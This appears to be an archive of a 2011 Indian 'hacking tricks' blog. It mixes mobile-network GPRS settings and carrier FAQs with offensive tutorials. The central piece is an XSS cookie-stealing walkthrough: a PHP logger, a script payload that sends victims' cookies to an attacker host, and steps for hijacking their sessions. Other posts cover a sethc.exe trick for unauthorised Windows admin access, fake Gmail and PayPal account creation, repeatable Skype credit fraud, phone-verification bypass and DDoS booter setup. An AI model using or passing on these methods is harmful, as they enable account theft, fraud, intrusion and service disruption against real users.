29 November, 2011

Manual Gprs Settings INDIAN Networks

Manual Gprs Settings INDIAN Networks
-----------------------------------------------------------------------
AIRTEL MANUAL GPRS SETTINGS

AIRTEL LIVE
Account Name–Airtel_live
Homepage–http://live.airtelworld.com
Username–Blank
Password–Blank Proxy–Enabled/yes
Proxy and Server Adress–
100.1.200.99
Accespoint Name–airtelfun.com
Proxy and Server Port–8080
Data bearer–GPRS/Packet Data Authentication Type–Normal

MOBILE OFFICE
Account Name–MO
Homepage–http://wap.google.com
Username–Blank
Password–Blank
Proxy–disabled/no Accespoint Name–airtelgprs.com
Proxy and Server Port–8080
Data bearer–GPRS/Packet Data
Authentication Type–Normal
-----------------------------------------------------------------------
Manual Bsnl Gprs Settings
Account Name–BSNL WAP
Username–Blank
Password–Blank
Proxy–Enabled/yes
Homepage–http://wap.cellone.in Proxy and Server address–
10.0.0.10
Proxy and Server Port–8080
Acces Point Name–gprswest.bsnl.in
or mizone Data bearer–GPRS/
Packetdata Authentication Type–Normal
NOTE:-
for east users:gprswest.bsnl.in
for north users:gprswest.bsnl.in
for south users:gprswest.bsnl.in OR simply use:Mizone as access
point

-----------------------------------------------------------------------

Manual Vodafone Gprs Settings

Account Name-Vodafone_gprs
Homepage-http://live.vodafone.in
User Name-(no need)
Pass-(no need)
Proxy-Enabled Proxy Address-10.10.1.100
Proxy Port-9401 or 9201
Data Bearer-Packet Data
Packet Data Access Point-
portalnmms
Network type-IPV4 Authentication: normal


-----------------------------------------------------------------------
TATA DOCOMO MANUAL
Docomo Dive in

Account Name–DocomDive
Username–Blank
Password–Blank Homepage–http://
divein.tatadocomo.com
Proxy and Server Port–8080
Proxy and Server adress–
10.124.94.7
Databearer–GPRS/Packetdata Acces Point Name–
TATA.DOCOMO.DIVE.IN
Proxy–Enabled/yes
Authentication Type–Normal
Tata docomo internet
Account Name–DocomNet Username–Blank
Password–Blank
Homepage–http://wap.google.com
Proxy-Disabled/No Databearer–
GPRS/Packetdata
Acces Point Name– TATA.DOCOMO.INTERNET
Proxy–Enabled/yes
Authentication Type–Normal
3)MMS
Account Name–DocomoMMS
Username–Blank Password–Blank
Access point-TATA.DOCOMO.MMS
home page-http://mmsc/
Proxy-Enabled/Yes
proxy server-10.124.26.94
port-8799 Databearer–GPRS/Packetdata
Proxy–Enabled/yes
Authentication Type–Normal

-----------------------------------------------------------------------
Idea Manual Gprs Settings

IDEA GPRS
Account Name–idea_GPRS
Username–Blank
Password–Blank
Homepage–http://wap.ideafresh.com Proxy and Server Port–8080
Proxy and Server adress–
10.4.42.45
Databearer–GPRS/Packetdata
Acces Point Name–imis
Proxy–Enabled/yes Authentication Type–Normal

Labels:

25 November, 2011

How to avoid Gmail sms veryfication [TUT]

In this TUT thread i want to show you how to bypass/avoid veryffication sms!

I have seen some other threads like this "how to bypass gmail sms with fake voice text" etc with many long methods..
is much simpler!...

STEP 1
First open your Internet Explorer.
Go to right top at "tools".Go to the bottom at the "internet options" (click it)
Click on "general"
Then at "Browsing History" and click "Delete"

STEP 2
Go to http://www.gmail.com and go to make a new account.
Important!:in "First" and "Last name" must be every time to using name the like a really one!(im using everytime Michale Anderson,George Aderson etc) ;)
Down on the "Desired Login Email" give a email like your name that u have give at the first/last name (michaelanderson123) etc
In security question give really names too like George,Peter etc!


Choose the same password everytime!doesnt matters!

Thats it!
Just repeat the STEP 1 every time that u make a new account!

This method its working excellent for me!!!

Labels:

COOKIE STEALING{TUT}{NOOB FRIENDLY}

before we can start putting our hands in the cookie jar, we must learn about cross-site scripting, usually abbreviated as XSS.

XSS is possible because of insecure coding by a coder. By giving us a means to interact with a site (such as a search box, or posting a comment) and not securing it, they leave it vulnerable to code injection. Let's give an example first, then I'll explain. Here is an example site:

Quote:http://www.current.com/

Now, we see that this site has a search box. Normally this search box is meant to handle normal queries, but lets see what happens when we try to inject some code. Type the following into the search box: <script>alert("VULNERABLE")</script>.

Now when you search for it, you'll see an alert box pop up with the word 'VULNERABLE' in it. This means the search box is vulnerable to code injection, and is vulnerable to XSS. Now here's why it works.

If you check the source code of the web page, you'll see that the our query (the injection code) was directly echoed into the source, without filteration. Normally, this is okay because most search queries are normal words, but since it echoed our script directly into the source, our browser interprets it as if that script was a part of the overall webpage, and therefore executed it. Now normally, who cares if I can echo little alert boxes, right? Wrong. Especially because this site has a user database that can be compromised

The script I executed was a simple block of JavaScript. Read more about JavaScript here.

Quote:http://www.w3schools.com/js/default.asp

There are a variety of ways to use XSS to grab cookies, I'll go over one.

Now, suppose we're gonna do an XSS attack on the site I posted at the begining. We need to have a place to store the cookies we get, so lets get some quick webhosting. We will need to make two files on our site, a text file, and a PHP file. Let's pretend our site is poopsey.com. Now, we make a file called log.php and put the following code in:

Quote:<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];

$data = "IP: " . $ip . "\n"
."Cookie: " . $cookie . "\n"
."Referrer: " . $referer . "\n"
."Browser: " . $browser . "\n\n";

$log = "cookies.txt";
@chmod($log, 0777);

$f = fopen($log, 'a');
fwrite($f, $data);
fclose($f);

@header("Location: $redirect");

?>

This is some PHP code that will write the some information about the slave, such as the IP, browser, etc. along with the cookie into the second file we will make, called cookies.txt. Just make a text file called cookies.txt and leave it empty. I could go in depth with exactly what all this code means, but it's better if you read up on PHP yourself, I can't spoon-feed everything you know. You can read up on PHP here.

Quote:http://www.w3schools.com/php/default.asp

Now comes the fun part. We don't need our own cookies, we need other users' cookies. So we look at the first ever XSS vulnerability check we did on current.com. Look at it.

Quote:http://www.current.com/search/search.do?...3E&x=0&y=0

The part I bolded (%3Cscript%3Ealert%28%22VULNERABLE%22%29%3C%2Fscript%3E) is the code that we had entered (<script>alert("VULNERABLE")</script>). We replace this code with the following code:

Quote:<script>document.location="http://poopsey.com/log.php?cookie="+document.cookie+"&redirect=http://current.com";</script>

Now the final URL looks like:

Quote:http://www.current.com/search/search.do?....location="http://poopsey.com/log.php?cookie="+document.cookie+"&redirect=http://current.com";</script>&x=0&y=0

Now send this link to someone logged into the current.com site. When they click this link, it will take them to poopsey.com/log.php, write all their info, then redirect them back to current.com. Now all you have to do is take the slave's cookie and replace your own cookie with the slave's cookie. Then you have access to the slave's account for some time, usually until the login session expires.

Now that I think about it, I never explained exactly what a cookie was, or how to replace your cookies with the slave's. Oh well, I guess that means someone has to go Googling and pursue the information themselves

Thanks for reading, and I hope you learned something

Labels:

Docomo GPRS FAQs

Q: What is Rs.15 GPRS pack and how do I get it?
There are multiple ways to start using the Rs.15 GPRS pack. You can SMS GPRS15 to 121 or do a special EVD (Electronic Voucher Denomination) recharge for Rs.15. To avail the benefits of the pack you have to select DOCOMOINTERNET APN on your handset. To request for internet settings just SMS &amp;amp;quot;INTERNET&amp;amp;quot; to 52270 and save them as default settings. With the Rs. 15 GPRS pack you get 500 MB usage free with a 3 day validity period.

Q: What is Rs.95 GPRS pack and how do I get it?

To start using the Rs.95 GPRS pack you have to first do a special EVD (Electronic Voucher Denomination) recharge for Rs.95. To avail the benefits of the pack you have to select DOCOMOINTERNET APN on your handset. To request for internet settings just SMS &amp;amp;quot;INTERNET&amp;amp;quot; to 52270 and save them as default settings. With the Rs. 95 GPRS pack you get 6 GB usage free with a 30 day validity period.

Q: What is Rs.48 GPRS pack and how do I get it?

To start using the Rs.48 GPRS pack you have to first do a special EVD (Electronic Voucher Denomination) recharge for Rs.48. To avail the benefits of the pack you have to select DOCOMOINTERNET APN on your handset. To request for internet settings just SMS &amp;amp;quot;INTERNET&amp;amp;quot; to 52270 and save them as default settings. With the Rs.48 GPRS pack you get 1 GB* usage free with a 30 day validity period.
*With effect from 00:00:01 hrs on 27th November 2010.

Q: What is Rs.33 GPRS pack and how do I get it?

There are multiple ways to start using the Rs.33 GPRS pack. You can SMS GPRS33 to 121 or do a special EVD (Electronic Voucher Denomination) recharge for Rs.33. To avail the benefits of the pack you have to select DOCOMOINTERNET APN on your handset. To request for internet settings just SMS &amp;amp;quot;INTERNET&amp;amp;quot; to 52270 and save them as default settings. With the Rs.33 GPRS pack you get 1 GB night usage free (11PM to 7 AM) with a 30 day validity period

Q: What is Rs.5 GPRS pack and how do I get it?

To start using the Rs.5 GPRS pack all you have to do is SMS &amp;amp;quot;GPRS&amp;amp;quot; and send it to 121. Then you must select DOCOMOINTERNET APN on your handset after which you can start browsing! To request for internet settings just SMS &amp;amp;quot;INTERNET&amp;amp;quot; to 52270 and save them as your default settings. With the Rs.5 GPRS pack you get 50 MB usage free .The validity of the pack is only till 12:00 AM (mid night) on the day of recharge and to re-subscribe the pack you will have to once again SMS &amp;amp;quot;GPRS&amp;amp;quot; to 121.

Q: What happens if I consume all my free usage and I am still left with validity?

After the consumption of the free day &amp;amp;amp; night usage of the packs you will be charged with a rate of 10P/10KB till your Validity expires. After your validity has expired, you will be charged with default rate of 10p/10kb.

Q: How do I start using internet once I have bought the packs?

By default you are provisioned for Tata DOCOMO Internet and DIVE IN settings at the time of purchase if you have a GPRS compatible handset. To get Internet settings SMS &amp;amp;quot;INTERNET&amp;amp;quot; to 52270 (toll free on Tata DOCOMO home &amp;amp;amp; charged Rs.3 at non DOCOMO Network) and save them as default settings. Once you have done that, just go to your internet browser and select the DOCOMOINTERNET APN (Access Point Name) on your mobile and start browsing.

Q: Can I access Tata DOCOMO internet on roaming and will I be charged if I use the internet post activation of these packs on roaming?

Yes you can use internet while on roaming, however, the free usage as stated for the above GPRS packs will only apply on the Tata DOCOMO home &amp;amp;amp; Tata DOCOMO roaming network. If you are roaming within India on networks other than the Tata DOCOMO network, you will be charged 10p/10KB. Check international roaming section on our site for data charges while on international roaming.

Q: What do I get with DOCOMO GPRS packs?

You get the following benefits with Tata DOCOMO GPRS:

Quick internet browsing from your mobile.
Access email and update facebook, orkut easily from your mobile.
Use instant messengers like G-talk, Yahoo, MSN, etc.
'On the move' connectivity.


Q: How do I configure Tata DOCOMO INTERNET Settings manually on my phone?

To manually configure TATA DOCOMO INTERNET settings please do the following:

Under the 'TATA DOCOMO INTERNET' WAP profile in Settings:

Connection Name..........TATA DOCOMO INTERNET

Data Bearer..........GPRS

Access Point Name..........TATA.DOCOMO.INTERNET

Username......... blank

Password.......... blank

Homepage.......... blank

Connection Security..........Off

Session Mode..........Permanent

In case of the WAP 2.0 compliant phones, the following extra settings need to be done:

Under Options..........Advanced Settings
Phone IP Address..........Automatic
DNS Address..........Automatic
Primary name server.......... 0.0.0.0
Second name server.......... 0.0.0.0
Proxy server address..........None
Proxy port number.......... 0

If you do not have a Nokia and Sony Ericsson phone, you'll need to set your phone manually with these details.

Setting Name..........Tata DOCOMO Internet

Home page.......... blank

Session mode..........Permanent

Connection Security..........Off

Data Bearer..........GPRS

GPRS Access point.......... TATA.DOCOMO.INTERNET

IP address..........blank

Authentication type..........Normal

Login type..........blank

User name..........blank

Password..........blank

Q: Does the Tata DOCOMO Internet work with any PC or Laptop?

Tata DOCOMO INTERNET works with any PC or Laptop that has Bluetooth or USB port for the cable.


Q: How do I connect my mobile phone using Bluetooth or cable?

Please follow the following steps:
Bluetooth:

Install the PC suite software.
Pair mobile handset with your PC or Laptop via the Bluetooth program.
Click on &amp;amp;quot;Connect to the Internet&amp;amp;quot; icon from the PC Suite programs.

Cable:
Install the PC suite software.
Connect mobile handset with your PC or Laptop via the USB cable.
Click on &amp;amp;quot;Connect to the Internet&amp;amp;quot; icon from the PC Suite Program.

Detail steps to connect mobile phone using Bluetooth or Cable:
Turn on the Bluetooth enabled cell phone and turn on the Bluetooth connection software.
Make the phone discoverable.
In Windows XP on the laptop go to My Bluetooth Places.
Select View Devices in Range.
After the discovery process is complete you should see the icon for the cell phone.
Right-click on the icon and select Discover Available Services.
To connect to your cell phone right-click on the Dial-Up Networking.
Select Connect Dial-up networking.
The phone will ask if you want to accept the connection request, decline or add to paired.
The last step pairs the phone and laptop and performs the connection request.
You will be prompted to enter a PIN code to pair up the devices, the PIN is entered in the cell phone.
A dialogue box appears asking for user name, password and the phone number of your ISP.
Click on the dial button to complete the connection.

Pairing:
You can pair your phone with your laptop/PC using any of the following:

Bluetooth
Serial Cable Connection

Configuration:
Create a new connection using the &amp;amp;quot;Make a new connection&amp;amp;quot; wizard on your PC / laptop.
Once a dialer is configured, leave the username and password blank.
Enter the access number *99#
You are now ready to start browsing!


Q: What will happen if I recharge with two GPRS packs on the same day?

If you recharge with two GPRS packs the same day then the data benefit of the existing GPRS pack will be forfeited and the data benefit of the current pack will apply.

Labels:

24 November, 2011

Bypass Phone Verification Trick

Description
This tutorial will help you bypass phone verification on any website, this can be useful when you need to use a phone number to sign up to a site and do not feel comfortable giving your real phone number, or if you want to make multiple accounts.

Step-by-Step Tutorial

1) Sign up to Tpad at the following link:
https://secure.tpad.com/signup/

2)
You will then receive an email with your Tpad number and your email verification link. It will say "Your Tpad number is 1752xxx.".
Verify your email and save your Tpad number.

3)
You must now download the Tpad program, you can download it using this link:
http://www.tpad.com/downloads/ninja-dl.php

4)
You must now go to ipkall.com and register with the following details:


Choose your account type: SIP
Choose Area Code for your IPKall Number: 253
SIP username: Your Tpad number
Hostname or IP address: sipx.tpad.com
Email Address: Your email
Password: Pick a password
# of Seconds to ring before hanging up: 120

You will then receive a number by email, this is the number you use on the phone verification. The email will say:

"Thank you for signing up. Your IPKall phone number is: 253-802-0xxx."

5)
Open the Tpad program, and enter your Tpad number and password. Wait for the phone verification call.

Labels:

How to Get the New Youtube Layout (Unreleased){Easy!}

It is how to get the new Youtube Layout that is not yet released. I know many people seem to be getting it through being random selected.. This could be it for many people.. I don't really know. I didn't find any other post like this, so here it is. I don't know how many of you know this, but it is pretty cool and easy to do..

Pictures (very large):


What you do:

1. Go to Youtube using Google Chrome or Firefox.
2. Open developer tools (Ctrl+Shift+J for Chrome and Ctrl+Shift+k for Firefox)
3. Go to the "Console" tab.
4. Paste the following: document.cookie="VISITOR_INFO1_LIVE=ST1Ti53r4fU";
5. Reload the page
6. Enjoy

Note: I am not sure when the new layout will be released or how long this will stay (probably until you clear your cookies?)

Anways... Enjoy

Labels:

20 November, 2011

Facebook Hack: 2 lakh accounts hacked in Bangalore

The recent Facebook hack has reportedly claimed over 2 lakh victims in Bangalore. According to a news report in Mid Day, some two lakh Facebook users in Bangalore had their accounts hacked and weblinks to their morphed pornographic pictures sent as feeds to friends and family.

Quoting social networking analysts, the report says that more than 2 lakh Bangalore Facebook accounts were hacked. The cybercrime department too is reported to have received calls and complaints regarding the mass hacking.

According to the report, there are around 50 posts on Facebook stating that the users are quitting the social networking site forever after being embarrassed before friends and family.

Incidentally, according to a Bloomberg report, Facebook claimed that it has identified those responsible for the deluge of hardcore porn and violent images in some users' newsfeeds, and said it is working with its legal team "to ensure appropriate consequences follow."

The social networking company made the statement after porn, pictures of extreme violence and faked photos of celebrities such as Justin Bieber in sexual situations had overrun the profiles of some Facebook users.

Facebook said that it has "drastically limited the damage caused" by a spam attack that took advantage of a browser vulnerability. "Protecting the people who use Facebook from spam and malicious content is a top priority for us," Palo Alto, California-based Facebook said in a statement.

Users were tricked into pasting malware into their browsers, which in turn resulted in the sharing of offensive content, Facebook said.

Labels:

17 November, 2011

Reliance has offered free F.B(upto 31st Dec 2011)

Gud News,guyz :D

when al tricks got banned...reliance has finally brought us its new trick.

1 or 2 days ago,i got a msg..it says,"FREE Facebook access kijiye http://d.fb.me/3vu  se apne feature phone par Facebook App dowload karke. Offer keval Dec 31 2011 tak.Reliance 3G"
that means  we can dwnld and use facebook for free until 31st December 2011

Now you can use it in handler




Labels:

16 November, 2011

How to hack an iPod Touch [TUT]

Before you begin
You'll need two key things: an iPod Touch (obviously) and a wireless network with connectivity to the Internet.

Getting an iPod Touch onto a wireless network is, most instances, a snap. Just go to Settings > Wi-Fi, switch Wi-Fi on (if it's not already on) and click on the name of the network you're connecting to. If it's a secure network -- these are listed with a padlock icon -- the Touch will prompt you for a password. This will be one keys listed on your router's wireless configuration pages. Once connected, verify that everything's working dandily by using Safari to surf the Web.

One way is to download BlackRa1n by Gehot, run it and you will have the option to install Cydia, Icy or Rock. You should install Cydia, then it is all jailbroken.

Here is another method:
The hack I'm demonstrating here only works on Touches running the 1.1.1 firmware. You can check which firmware you're currently running by going to Settings > General > About. If you're using a later version, read the next section to see how you can restore your firmware.

You'll need to find the 1.1.1 firmware if you want to try this hack


Downgrade to 1.1.1/Restore to unhacked state
You'll only need to follow the steps in this section if you need to downgrade to the 1.1.1 firmware or wish to restore your Touch to a pristine and unhacked state. Keep in mind that by doing this you'll wipe all the existing data on your iPod -- photos, videos, music, bookmarks, contacts, etc.


Firstly, you'll need to find out whether you've got a copy of the 1.1.1 firmware. On Windows machines, iPod firmware is generally stored in the folder C:\Documents and Settings\USER_NAME\Application Data\Apple Computer\iTunes\iPod Software Updates. Substitute your Windows login name for USER_NAME. The actual firmware file will be named something like iPod1,1_1.1.1_3A110a_Restore.ipsw. If you can't find, you'll need to search for it on the Internet.

Once you've located your copy of the 1.1.1 firmware, connect the Touch to your computer via USB. When iTunes starts up, click on your iPod Touch under the Devices tab along the left-hand side, and then hold down the Shift key (or the Option key for Mac users) while clicking on the Restore button. Navigate to where your firmware is stored and click OK. Within about five minutes you'll have a clean iPod running the 1.1.1 firmware.

Once your Touch has been hacked you can download apps, games and utilities. You can even skin the interface to your liking

Hacking the Touch

Now this is the easy part. Fire up the Touch's Safari Web browser and head to jailbreakme.com Scroll down the page and click on the big button labelled "Install AppSnapp". You'll now be dropped back to the main screen while the hack is applied and the appropriate code is downloaded. It shouldn't take more than a few minutes, so just sit back and twiddle your thumbs. Once everything's done and dusted, the "slide to unlock" screen will appear.

On the Touch's main screen, you'll now notice a new application called Installer. Click this to download and install applications developed for the iPhone and iPod Touch. Some applications developed for the iPhone won't work on the Touch -- namely anything that requires the iPhone's camera or cellular capabilities. Nonetheless there's a good range of games, wallpapers, skins and productivity software, as well as Linux software, available.

Thanks to New 2 Hackin for spurring me onto make some tuts.

Labels:

How To Increase the Fans of a page

THIS IS NEW TRICK TO INCREASE THE FANs OF PAGE



NOW LET US START
WHAT TO DO AND HOW I INCREASE MA FAN PAGE .




A couple month ago facebook added a new function that enables users to tag their friends on their comment system (status update and wall comment ) . by default you can do that simply by typing @ and type any letter then list of your friends with that particular letter will show up.

 But how create tag for your friends name ?  for example ,you have a friend name john, you can tag john with another name, for example Michael .
interesting, right?


you can play more with this trick,
for example make your comment fully clickable to your own fan page
,
[ TO INCREASE THE FAN OF PAGE ] etc. just be more creative .
 with this trick you can even tag people who are not your friends with you  as long as you have their facebook ID OK



lets start to show you how to do  this simply put your comment with this format:

@@[0:[Facebook ID:0:Tag name]]  

@@[0:[Facebook ID:0: hello Prabhjeet]]



.



  •  Facebook ID is the unique id identifying every facebook profile;You can read and find out how to get     the facebook id in ma next post

  • TAG name would be your custom text, this way you can link to your friends’ facebook profile but whatever text you want .



for example :

 @@[0:[:0:hi darling] your comment here ……

 with this code you can tag any one with comment ...


IF ANY MA Friend dont understand after this tutorial then just comment in ma page

SO WITH TRICK YOU CAN COMMENT ANY WHERE WITH YOUR FAN PAGE TAG USING UR PAGE ID ,GROUP ID , PROFILE ID

Labels:

How to upload animated gif images On facebook

THIS is SO simple

Apparently, it is believed that Facebook does not support animated GIF images. This belief is correct to some extent. However, as you can see from this post "Google Make Me Smart", you definitely can insert an animated GIF image into a fcaebook post. ITS NOw possible to post moving animated gif images in facebook . but how , very few people know about this ...

The statement that 'FACEBOOK does not support animated images' only means to say that the like google+ it does not support such images. In other words, if you try to upload an animated GIF image in your facebook post though browsing , the GIF file is converted automatically into a static PNG file during the upload process. and some time it will show error notice that image is not 180 pixel.

So how does one add an animated GIF into a Facebook post? Very simple really.
 

So I Made this tutorial just follow step by step .
  1. Just login directly into your Facebook. All images added to posts on facebook are actually uploaded on facebook server .
  2. Chose any free or any image host on the internet that allows to hotlink an uploaded image and upload your moving/ animated gif or any image to that host. like  freeimagehosting.com
    Let's say you upload your image to photobucket.com. Get the url of the image location and put it in this code.
  3. Get the url of the image location and put it in this code.








    <img src="http://myimagelocation.gif" />

    Replace the phrase -- http://myimagelocation.gif -- in the code with the url address of your image.

    if u dont wanted to upload any gif images on any image hosting server


    then use this Application in facebook .or THERE is another option go to HERE  and then you can right click on the image which is moving and choose something like "image location " the exact wording for that option in the right click menu depend on the browser that you are using and you can get the url OF  the images in this way


    .
  4. For exmple in Internet Explorer Right click  MENU would have the 'properties' , its the last one of the option , and you can copy the url address of your images after you click on 'properties' first .
  5. Copy the url of your image place this in html code in  images tag  as mentioned above
    like <img src="http://myimagelocation.gif" />

    Replace the phrase -- http://myimagelocation.gif --
  6. And Then paste the completed code in your facebook  note in the place where you want your images to go

    IN BODY TAG of facebook notes post these html image tag codes 

    once you create a note with your external picture included in it, the note with the image thumbnail will show up in your facebook stream and the news feeds of your friends after you publish it and any time later if want to repost that note's page on your wall or on your friends wall

    Thats all its so simple if you face any problem after this tutorial IN ANY WHERE just comment here i will solve your problems in uploading animated picture in facebook.

Labels:

TOP 10 FireFox add-ons To Browse Safely and Anonymously

TOP 10 FireFox add-ons To Browse safe and Anonymously



Mozilla firefox Enables a user  to install plug-ins and add-ons that can only increase the efficiency of our browsing. It is recommended to surf anonynmously and hide you IP, This help us secure our private information from getting into the wrong person's hand .


The following are just some of the better firefox tools that can make the internet a safer place.


01.   BetterPrivacy 

     BetterPivacy serves to protect not deletable longterm cookies , commonly known as 'Super-Cookie' .
       
    DOWNLOAD BetterPrivacy 

02 .  Close'n forget 
         
   Very simple add-ons that closes the current tab and make firefox forget about the visit:
   suppressing cookies related to the current pages, cleaning(beware:may be partial) the browser history and so on.
 
  DOWNLOAD  Close'n forget

03. Web of Trust (WOT)

This add-on is a safe surfing tool for your browser. wot ratings are powered by globaL community of millions of trustworthy users who have rated millions websites based on their experiences.

 DOWNLOAD WOT Firefox Add-ON 


04. TOR-PROXY

There Are about 14,836 users using this add-on


TOR-PROXY.Net is a CGI-WEB-PROXY, which tunnels your traffic through different anonymization-networks.
DOWNLOAD TOR-PROXY

05. FOX TOR

  For anonymous web browsing some people are using encrypted  TOR NETWORK 


NOTE : This add-ons is not available for firefox 3.6.16

 DOWNLOAD : FOX TOR

06. ProxySel


This add-on allow you to choose a proxy from a drop down list and also to import proxies from  proxy list 

 DOWNLOAD :: ProxySel 

 07 Anonymization Toolbar -


This special tool will enable you to stay more anonymous while browsing the internet through Firefox. There are one click options that allow you to delete your browsing history, cache and cookies

DOWNLOAD : Anonymization Toolbar 

08. BrowseATWork

Add-on ideal for viewing webpages blocked by many corporate or school filters.
especially usefull for students in the university.


DOWNLOAD BrowseATWork

09. FoxyProxy standard 3.3


FoxyProxy is an advanced proxy management tools that completely replaces Firefox's limited proxying capabilities . It offers more features than switchProxy, Proxybutton,QuickProxy,xyzproxy,ProxyTex,TorBtton, etc.

DOWNLOAD :: FoxyProxy 

10. Panic add-ons
Panic add-on gives you the ability to close all tabs, while opening another one(which you can configure) that will make it look like you are doing what you should be doing.

DOWNLOAD : Panic add-ons

Labels:

14 November, 2011

Get FREE Skype Credit over and over again [TUT 2011]

Maybe few of you allready know for this "trick" allready,but this post is to people which dont know :).

OK, lets start :


Step 1:- Download hotspot shield vpn by going
here and connect it.

Step 2:- Now visit free Skype
voucher generator link and click on get free voucher.


Step 3:- Now you receive the free voucher



Step 4:- Login into your Skype account and click on Redeem Voucher.


 Step 5:- Paste the voucher code Here and click on Redeem Voucher and you will get free 1.02 Euro


Now if you want more cash in your Skype account, on virtual machine ( i preffer VM Ware Workstation) install hotspotshield,make sure you get different ip adress, and change your "computer/virtual machine" name. Repeat all the steps as much as you like :)


Labels:

Exclusive UCWEB 8 ( PC Version )

System Requirments -

FOR XP You need .NET Framework


Labels:

Hack Windows 7 Admin Account [No CDs]

Don't know if this has been posted before and I don't know if its been patched or which versions of Windows 7 it works for, but here it is anyway.
1. Press the power button to turn on your computer.
2. While your on the screen with the animated Microsoft logo press and hold the power button until it turns off.
3. Press the power button to turn on again.
4. You should now see the option to launch Start Up Repair. Select the option and press enter.
5. Run Startup Repair.
6. You should see a blue bar that moves across the screen repeatedly. Above it should be messages that say "searching for problems" or something.
7. The message should change to "Attempting repairs" within a few minutes.
8. Leave the computer running. This message should be there for 10-40 minutes depending on your computer.
9. After 10-40mins a message should pop up that says "start up repair could not fix the problem". Click the arrow next to "show problem details".
10. Scroll to the bottom and click the link to the .txt file.
11. Notepad should open up with the file.
12. In notepad click File->Open.
13. You can now use the file browser to perform the sethc.exe hack.
14. Go to C:\Windows\system32 and find sethc.exe and rename it to random.exe or something.
15. Copy the cmd.exe and rename the copied file to sethc.exe
16. Restart the computer and at the login screen press the "shift" key 5 times in quick succession.
17. Type in the cmd window "control userpasswords2" without the quotation marks.
18. You can now make a new admin account and login with it or make your account an admin.

Hope this was helpful.

Labels:

12 November, 2011

How to remove any survey [Tutorial]

When u see download link for some file and u go there and Freaking Survey show up and u can't remove it .. Well u can !! It is very very Simple...

U need just 1 older browser.. like mozila.. Go to the page on what is survey.. Copy this code paste it on survey site website typing line


Code:
javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);eval("delete clear"+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)=="undefined"){var ar=document.createElement("iframe");ar.style.display="none";document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99;j--)window["clear"+z[i]](j);}})();var bd="[url]http://survey-remover.com/[/url]";var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122));return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+sj[i]+"(){")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:"2.0",domain:"http://survey-remover.com/",id:"4e6a835ea2e00",TO:setTimeout("alert(\"It appears that the host could not be reached :(\nPlease try to use the bookmarklet again later!\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/";a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.init();};document.documentEleme ​ nt.firstElementChild.appendChild(a);};window[xc[0]](window[er],110);})();

And press enter..

Labels:

07 November, 2011

Play Angry Birds on your Favorite Web Pages


The green pigs stole the birds’ eggs and are now relaxing inside their castles. The birds, obviously angry, are preparing to destroy the castles and the hiding-pigs to seek revenge.
This is the plot of the original Angry Birds game that most of you may have played on your mobile phone or on your desktop. Nokia Argentina has created another version of the Angry Birds game where the main characters – the birds and the villain pigs - are the same but instead of castles, the green pigs are now hiding on your favorite web pages.
To get started, drag this Angry Birds bookmarklet to your bookmarks toolbar, then open any website and press the bookmarklet. Now use your mouse to strike the pigs and see how the various elements of the page – like the text and images - fall. Good fun!
Here’s a video demo of the Angry Birds game in action. Thank you Karthik for the tip!

Labels:

Magic Off VLC Media Player

1 Open VLC Media Player

2 Press CTRL + N

3 Now Type screen://

4 Now Click On Play Button

5 Now Wait Just Few Second And See Magic :D


Labels:

06 November, 2011

What's new in Opera mini 6.5

Whats New in Opera Mini 6.5
1. Added Data Usage view (Goto help » Data Usage).
2. Added bookmark option in Address bar (For Touchscreen devices only).
3. Added protocol setting in advanced options.
4. Improved handling of Saved Pages when upgrading client.
5. Added status bar.
6. Added options to show/hide navbar, status bar.
7. Fixed various stability and performance issues.

Labels:

04 November, 2011

How to run symbian applications on computer

Follow these steps to run a Symbian application on your computer.
  1. Download Symbian SDK from here.( It's a huge file )
  2. Install the SDK and all chaintools included in the package in their default location.
  3. After all packages are installed, reboot your PC.
  4. Now goto Start » Program files » Nokia Developer Tools » Symbian SDK » Emulator to launch the emulator
  5. Wait for the Emulator to completely load. The Emulator program will look like this when finished loading.


  6. Now inside the Emulator program, goto File » Open and then choose your favorite Symbian applications that you want to run.


  7. All set, install and enjoy your favorite Symbian apps on your PC. If you get error while installing unsigned applications, goto Menu » Settings » Application settings and change value from Signed only to all.

Labels:

TRAI raises daily SMS limit

Good news for us. TRAI had previously limited daily outgoing SMS to 100 per day but due to constant complaints it has now raised this limitation to 200 SMS per day.

Labels:

Tutorial on How To Verify Paypal Accounts

This tutorial is simple, but it does take a couple of days till' your PP is verified.
This does not involve a credit card.

Step One.
You will need to go to this site.

Step Two.
Press the Sign-Up Now tab.

Note: IP's are logged when registering, so being on a VPN is recommended. Try ProXPN or CyberGhost.

Step Three.
Use FakeNameGenerator when putting in the info. When done click "continue".

Step Four.
Create an account.


Step Five.
After that it will take you to this page.
Stay on the that page, you will need it for the next step.

Step Six.
Sign on to your Paypal account.
After that hover you mouse over "Profile" and press "Add or Edit Bank Account".



After that everything is straight forward. Just fill out the routing and account info with the Upside card info. Paypal will send little amounts of money to the account and ask how much they sent you. Just sign onto the Upside card account to see. Good luck!

Labels:

DDoSeR Setup [TUT]

1st. Get your client booter whichever you may choose either free booters or ones you pay for if your gonna buy one I recommend is The Best DDoSeR on the Market as of currently is DDoSeR 4.2 I reccomend going to purchase it from ddoser.info and you can find the thread for it in the premium sellers section :p
Okay so here we go.
2nd. Go to no-ip.com and make an account, once you make the account, make a DNS for example something like this MoFkN123.no-ip.info (to make a DNS click add host make sure its no-ip.info)
